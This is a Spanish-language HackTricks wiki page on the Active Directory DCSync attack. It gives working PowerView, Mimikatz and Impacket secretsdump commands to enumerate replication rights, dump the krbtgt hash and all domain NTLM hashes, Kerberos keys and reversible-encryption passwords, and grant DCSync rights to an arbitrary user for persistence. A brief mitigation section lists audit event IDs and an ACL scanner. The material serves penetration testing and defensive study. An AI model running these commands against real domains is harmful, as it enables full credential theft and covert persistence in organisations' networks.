DCSync

Utiliza Trickest para construir y automatizar flujos de trabajo fácilmente impulsados por las herramientas comunitarias más avanzadas del mundo. Obtén acceso hoy:

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

DCSync

El permiso DCSync implica tener estos permisos sobre el dominio mismo: DS-Replication-Get-Changes, Replicating Directory Changes All y Replicating Directory Changes In Filtered Set.

Notas importantes sobre DCSync:

El ataque DCSync simula el comportamiento de un Controlador de Dominio y solicita a otros Controladores de Dominio que repliquen información utilizando el Protocolo Remoto de Servicio de Replicación de Directorios (MS-DRSR). Debido a que MS-DRSR es una función válida y necesaria de Active Directory, no se puede desactivar ni deshabilitar.
Por defecto, solo los grupos de Administradores de Dominio, Administradores Empresariales, Administradores y Controladores de Dominio tienen los privilegios requeridos.
Si alguna contraseña de cuenta se almacena con cifrado reversible, hay una opción disponible en Mimikatz para devolver la contraseña en texto claro.

Enumeración

Verifica quién tiene estos permisos usando powerview:

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}

Explotar Localmente

Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'

Explotar Remotamente

secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
[-just-dc-user <USERNAME>] #To get only of that user
[-pwd-last-set] #To see when each account's password was last changed
[-history] #To dump password history, may be helpful for offline password cracking

-just-dc genera 3 archivos:

uno con los hashes NTLM
uno con las claves Kerberos
uno con contraseñas en texto claro del NTDS para cualquier cuenta configurada con cifrado reversible habilitado. Puedes obtener usuarios con cifrado reversible con

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

Persistencia

Si eres un administrador de dominio, puedes otorgar estos permisos a cualquier usuario con la ayuda de powerview:

Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose

Entonces, puedes verificar si al usuario se le asignaron correctamente los 3 privilegios buscándolos en la salida de (deberías poder ver los nombres de los privilegios dentro del campo "ObjectType"):

Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}

Mitigación

ID de Evento de Seguridad 4662 (La política de auditoría para el objeto debe estar habilitada) – Se realizó una operación en un objeto
ID de Evento de Seguridad 5136 (La política de auditoría para el objeto debe estar habilitada) – Se modificó un objeto del servicio de directorio
ID de Evento de Seguridad 4670 (La política de auditoría para el objeto debe estar habilitada) – Se cambiaron los permisos en un objeto
Escáner de ACL de AD - Crear y comparar informes de ACL. https://github.com/canix1/ADACLScanner

Referencias

Apoya a HackTricks

Revisa los planes de suscripción!
Únete al 💬 grupo de Discord o al grupo de telegram o síguenos en Twitter 🐦 @hacktricks_live.
Comparte trucos de hacking enviando PRs a los HackTricks y HackTricks Cloud repositorios de github.

Usa Trickest para construir y automatizar flujos de trabajo fácilmente, impulsados por las herramientas comunitarias más avanzadas del mundo. Obtén acceso hoy:

PreviousDCShadow NextDiamond Ticket

Last updated 4 months ago